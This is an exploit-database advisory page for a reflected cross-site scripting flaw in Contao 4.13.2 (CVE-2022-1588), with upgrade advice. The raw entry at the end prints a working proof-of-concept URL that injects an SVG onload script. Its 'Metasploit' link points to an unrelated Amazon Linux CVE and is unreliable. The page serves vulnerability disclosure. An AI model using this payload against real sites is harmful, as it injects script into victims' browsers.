Contao 4.13.2 - Cross-Site Scripting (XSS)

vendor:

Contao

by:

Chetanya Sharma

5.5

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: Contao

Affected Version From: 4.13.2

Affected Version To: 4.13.2

Patch Exists: YES

Related CWE: CVE-2022-1588

CPE: a:contao:contao:4.13.2

Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2021-45960/

Other Scripts:

Platforms Tested: Kali OS

2022

Contao 4.13.2 – Cross-Site Scripting (XSS)

The Contao version 4.13.2 is vulnerable to a cross-site scripting (XSS) attack. An attacker can exploit this vulnerability by injecting malicious code into the 'canonical URL' field, which is not properly sanitized. This allows the attacker to execute arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to upgrade to a patched version of Contao. The vendor has released a security advisory and a patch for this issue. Users should update their Contao installations to version 4.13.3 or later.

Source

Exploit-DB raw data:

# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 04/28/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://contao.org/en/
# Software Link: https://github.com/contao/contao/releases/tag/4.13.2
# Version: [ 4.13.2 ] 
# Tested on: [KALI OS]
# CVE : CVE-2022-1588
# References: 
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
---------------

Steps to reproduce:
Navigate to the below URL
URL: https://localhost/contao/"><svg//onload=alert(112233)>